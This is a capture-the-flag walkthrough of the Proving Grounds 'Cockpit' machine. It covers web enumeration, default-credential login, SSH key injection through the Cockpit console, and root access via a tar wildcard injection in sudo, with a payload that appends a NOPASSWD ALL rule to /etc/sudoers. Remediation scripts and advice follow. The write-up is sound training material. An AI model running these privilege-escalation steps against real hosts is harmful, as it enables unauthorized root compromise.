Box Overview

Cockpit is a Linux machine from Offensive Security’s Proving Grounds that demonstrates web enumeration, SSH key injection via a web management interface, and sudo privilege escalation through tar wildcard exploitation.

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.227.10 -T4 -oN first.scan -p-

Open Ports:

  • 22/tcp - SSH (OpenSSH 8.2p1 Ubuntu)
  • 80/tcp - HTTP (Apache 2.4.41)
  • 9090/tcp - SSL/zeus-admin (Web management interface)

Web Enumeration

Port 80 - Apache

Initial inspection revealed a static template website with no obvious vulnerabilities.

Directory Fuzzing

KEYNOTE: Always scan with file extensions!

gobuster dir -u http://192.168.227.10 \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x php,html,txt

Key Discoveries:

  • /blocked.html - Informational page
  • /login.php - Authentication page ✅
  • /logout.php - Session termination
  • /css/, /js/, /img/ - Static resources

Critical Finding: Without the -x php extension flag, login.php would have been missed!

Initial Access - Web Login

Attempted default credentials on /login.php:

Username: admin
Password: (empty)

Authentication successful! 🎯

Credential Discovery

Found base64-encoded credentials in the web interface:

User: James

echo -n "Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=" | base64 -d
# canttouchhhthiss@455152

User: Cameron

echo -n "dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy" | base64 -d
# thisscanttbetouchedd@455152

SSH Attempt

ssh james@192.168.227.10
# Permission denied (publickey)

The server only offers the publickey method (password authentication is disabled), so the recovered passwords cannot be used over SSH directly.

Initial Access via Cockpit Management Interface

Port 9090 Analysis

The service nmap labels zeus-admin on port 9090 is actually Cockpit, a web-based Linux server management tool. Cockpit authenticates against the host's own user accounts (via PAM), so credentials that work here are also the users' Linux passwords.

Features discovered:

  • Terminal access
  • Account management
  • SSH key management

SSH Key Injection

Generate SSH Key Pair

ssh-keygen -t ecdsa -f james_ecdsa
# Enter passphrase: (empty)
# The key type name is case-insensitive; ed25519 would do just as well

Generated files:

  • james_ecdsa - Private key
  • james_ecdsa.pub - Public key

Public Key Content

cat james_ecdsa.pub
ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGX7pbw0CAArVga2JsSeQ+Ex4xf4ylNqBDSOx85+A/RWSzhkBQQNUk2rgl7NuzY7Dq4rNT5j6SKfVr1LPTziyDY= kali@kali

Inject via Cockpit

  1. Navigate to the Cockpit web interface: https://192.168.227.10:9090
  2. Authenticate with the discovered credentials
  3. Go to Accounts → james
  4. Add an authorized SSH key
  5. Paste the public key content
  6. Save

SSH Access

ssh james@192.168.227.10 -i james_ecdsa

Shell obtained as james!

james@blaze:~$ cat local.txt
669f9c71e19070836589e6ae17fa3823

Local flag captured!

Privilege Escalation

Sudo Enumeration

sudo -l

Output:

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

Vulnerability: james can run tar as root without a password, and the rule ends in a wildcard. Sudoers matches * against any argument string, and the shell expands * in whatever directory james runs the command from, so james controls the file names (and therefore the arguments) that reach tar.

Exploitation Strategy

Reference: GTFOBins - tar

The trailing wildcard allows tar wildcard injection: file names that look like options are expanded into the argument list, and tar's --checkpoint-action=exec option runs an arbitrary command.

Payload Creation

cd /tmp

# Create malicious payload
vim payload.sh

payload.sh:

#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers

Make executable:

chmod +x payload.sh

Wildcard Exploitation

Create files that will be interpreted as tar command-line arguments:

# Create checkpoint trigger
echo "" > '--checkpoint=1'

# Create checkpoint action to execute payload
echo "" > '--checkpoint-action=exec=sh payload.sh'

How it works:

  • The shell expands * in the current directory (/tmp) before sudo runs tar, so the attacker controls the argument list; the * in the sudoers rule is itself a sudoers wildcard that lets any arguments through
  • Pathname expansion does not word-split, so '--checkpoint-action=exec=sh payload.sh' arrives at tar as a single argument despite the space
  • GNU tar's option parser accepts options anywhere in argv, so a file name beginning with -- is treated as an option
  • --checkpoint=1 makes tar run its checkpoint actions at every record flush, i.e. as soon as it starts writing the archive
  • --checkpoint-action=exec=sh payload.sh makes tar spawn /bin/sh -c 'sh payload.sh' with tar's effective uid (root under sudo) and tar's working directory, which is why the payload must sit in the directory the command is run from

Execute Exploit

sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *

Tar processes files and executes payload as root!
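To see the mechanism in isolation, here is an added demonstration (not from the original writeup) that runs the same three files through GNU tar in a scratch directory, without sudo. It assumes GNU tar (--checkpoint is a GNU extension), a POSIX sh and mktemp; the stand-in payload drops a marker file instead of editing sudoers. It also shows that anchoring the glob as ./* defeats the trick, which matters for backup scripts you write yourself; on the box it is irrelevant, because the attacker, not the defender, types the glob that the sudoers rule permits.

```sh
#!/bin/sh
# Added demonstration, not code from the original writeup.
# Assumptions: GNU tar, POSIX sh, mktemp. Runs entirely as the current user.
set -e

# Create a scratch directory that mirrors what the attacker put in /tmp.
# The stand-in payload just drops a marker file instead of editing sudoers.
make_scratch() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\ntouch payload_ran\n' > "$dir/payload.sh"
    echo "ordinary data" > "$dir/notes.txt"
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh payload.sh"
    echo "$dir"
}

# Report whether the smuggled checkpoint action fired, then clean up.
# Prints "executed" or "clean".
report() {
    if [ -e "$1/payload_ran" ]; then echo executed; else echo clean; fi
    rm -rf "$1"
}

# Bare "*", as the sudoers rule allows. The shell expands it after the cd,
# so tar's argv contains --checkpoint=1 and --checkpoint-action=... as
# separate words; GNU getopt accepts options anywhere in argv.
vulnerable_glob() {
    dir=$(make_scratch)
    (cd "$dir" && tar -czf backup.tar.gz * >/dev/null 2>&1) || true
    report "$dir"
}

# "./*": every expansion begins with "./", so tar only ever sees file names
# and the option-shaped files are archived like any other file.
anchored_glob() {
    dir=$(make_scratch)
    (cd "$dir" && tar -czf backup.tar.gz ./* >/dev/null 2>&1) || true
    report "$dir"
}
```

The expansion order of * does not matter: tar permutes its arguments, so the checkpoint options take effect wherever they land in argv.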

Verify sudoers modification:

sudo -l

Output:

User james may run the following commands on blaze:
    (root) NOPASSWD: ALL

Root Shell

sudo /bin/bash
root@blaze:/tmp# cat /root/proof.txt
92d0bde76ffc2bddecc04859ff8b92e0

Root flag captured! 🎯

Attack Chain Summary

  1. Web Enumeration → Found /login.php (with -x php flag)
  2. Default Credentials → admin:(empty) provided access
  3. Credential Discovery → Base64-encoded passwords found
  4. Cockpit Interface → Discovered web management tool on port 9090
  5. SSH Key Injection → Added public key via Cockpit account management
  6. SSH Access → Authenticated as james
  7. Sudo Enumeration → Discovered tar with wildcard in /tmp
  8. Tar Wildcard Exploit → Injected sudoers modification
  9. Root Access → Full system compromise

Key Takeaways

Lessons Learned

KEYNOTE: Enumeration is key!

  1. Always use file extensions in directory fuzzing - Without -x php, the critical /login.php endpoint would have been missed
  2. Default credentials are still prevalent - Simple credentials like admin:(empty) still work
  3. Web management interfaces = attack surface - Cockpit's SSH key management feature turned leaked passwords into key-based SSH access, and would serve just as well for persistence
  4. Wildcard exploitation remains effective - Sudo commands with wildcards are dangerous
  5. Read output thoroughly - Pay attention to command outputs for exploitation opportunities

Vulnerabilities Exploited

  1. Weak Authentication - Default credentials on web interface
  2. SSH Key Injection - Key added through a legitimate Cockpit feature using leaked credentials; the weakness is the credential leak and the absence of monitoring on authorized_keys, not Cockpit itself
  3. Sudo Misconfiguration - Tar with wildcard expansion
  4. Tar Checkpoint Exploitation - Command injection via checkpoint actions

Remediation

Web Application

  • Enforce strong authentication
  • Implement account lockout policies
  • Require 2FA for administrative functions
  • Audit user actions in web interfaces

SSH Configuration

  • Monitor authorized_keys modifications
  • Implement centralized SSH key management
  • Alert on new key additions
  • Regular key rotation policies
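Monitoring authorized_keys can be as simple as comparing the current file against a baseline copy kept on a root-owned path. The script below is an added example (not from the original writeup) that does this; it assumes POSIX sh, awk, sort, comm and mktemp. It compares only the key material (type and base64), ignoring options and comments, so that editing a comment can neither hide nor fake a change. The baseline and current files in demo_injected_key are constructed samples; the ecdsa key is the one generated earlier in this writeup.

```sh
#!/bin/sh
# Added example, not part of the original writeup.
# Assumptions: POSIX sh, awk, sort, comm, mktemp.
set -e

# Reduce an authorized_keys file to "<type> <base64>" pairs, sorted and
# de-duplicated. Leading options (from=, no-pty, command=...) and trailing
# comments are dropped so that renaming a comment cannot hide a new key.
key_material() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }      # skip comments and blank lines
        {
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp(256|384|521)|sk-)/) {
                    print $i, $(i + 1)
                    break
                }
        }' "$1" | sort -u
}

# Print every key present in CURRENT ($2) but absent from BASELINE ($1).
new_keys() {
    old=$(mktemp); new=$(mktemp)
    key_material "$1" > "$old"
    key_material "$2" > "$new"
    comm -13 "$old" "$new"          # lines only in the second (current) file
    rm -f "$old" "$new"
}

# Constructed sample: the baseline holds one admin key; the current file has
# the same key plus the ecdsa key from this writeup, wrapped in options.
demo_injected_key() {
    base=$(mktemp); cur=$(mktemp)
    cat > "$base" <<'EOF'
# baseline captured at provisioning time (constructed sample)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBaselineKeyMaterialConstructedSample admin@bastion
EOF
    cat > "$cur" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBaselineKeyMaterialConstructedSample admin@bastion
no-pty,from="192.168.45.0/24" ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGX7pbw0CAArVga2JsSeQ+Ex4xf4ylNqBDSOx85+A/RWSzhkBQQNUk2rgl7NuzY7Dq4rNT5j6SKfVr1LPTziyDY= kali@kali
EOF
    new_keys "$base" "$cur"
    rm -f "$base" "$cur"
}
```

Run new_keys from cron or a configuration-management check against each user's ~/.ssh/.authorized_keys and alert on any output; removed keys can be listed the same way with comm -23.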

Sudo Configuration

# BAD - Allows wildcard exploitation
james ALL=(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

# BETTER - Fixed argument list, no wildcard, target user limited to root
james ALL=(root) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz /var/www/html

  • Avoid wildcards in sudo commands: without a wildcard, sudoers matches the argument list literally, so the user cannot add or change arguments
  • Use absolute paths
  • Limit command options, or move the whole command into a root-owned script and grant only that script
  • Do not have root write output into a world-writable directory such as /tmp; a fixed path under /var/backups avoids symlink games where fs.protected_symlinks is disabled
  • Check edits with visudo -c and audit the sudo configuration regularly
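A tighter design than trimming the argument list is a root-owned script that takes no arguments, archives a fixed directory with -C dir . (so no glob and no user-supplied word ever reaches tar), and is the only thing the sudoers rule names. The script below is an added example, not from the original writeup; the install path /usr/local/sbin/backup-www and the backup paths are assumptions. The rule's trailing "" is sudoers syntax meaning the command may only be run with no arguments.

```sh
#!/bin/sh
# Added example, not from the original writeup. Paths are assumptions.
#
# Install as /usr/local/sbin/backup-www, owned by root:root, mode 0755
# (if james can write the script, he can still become root). Grant it
# with no arguments and verify the sudoers file with `visudo -c`:
#
#   james ALL=(root) NOPASSWD: /usr/local/sbin/backup-www ""
#
set -eu

# Archive the contents of SRC into DEST. "-C SRC ." makes tar read the tree
# from a fixed starting point: no shell glob, no caller-supplied file names,
# nothing that can be mistaken for an option. Returns tar's exit status.
backup_tree() {
    src=$1
    dest=$2
    tar -C "$src" -czf "$dest" .
}

# Fixed parameters: the only thing sudo ever runs. The destination is a
# root-owned directory, not /tmp.
backup_www() {
    backup_tree /var/www/html /var/backups/www.tar.gz
}

# List an archive's entries (used to verify a run).
archive_entries() {
    tar -tzf "$1" | sort
}

# Only act when executed as the installed script, so the functions can also
# be sourced and exercised on a scratch directory.
case "${0##*/}" in
    backup-www) backup_www ;;
esac
```

With this layout an option-shaped file inside /var/www/html is just another entry in the archive, because tar never sees its name on the command line.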

Tools Used

  • nmap
  • gobuster
  • base64
  • ssh-keygen
  • GTFOBins

Techniques

  • Web directory fuzzing
  • Base64 decoding
  • SSH key generation and injection
  • Sudo enumeration
  • Tar wildcard exploitation
  • GTFOBins reference

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice


“Always enumerate with file extensions - you never know what you’ll find!”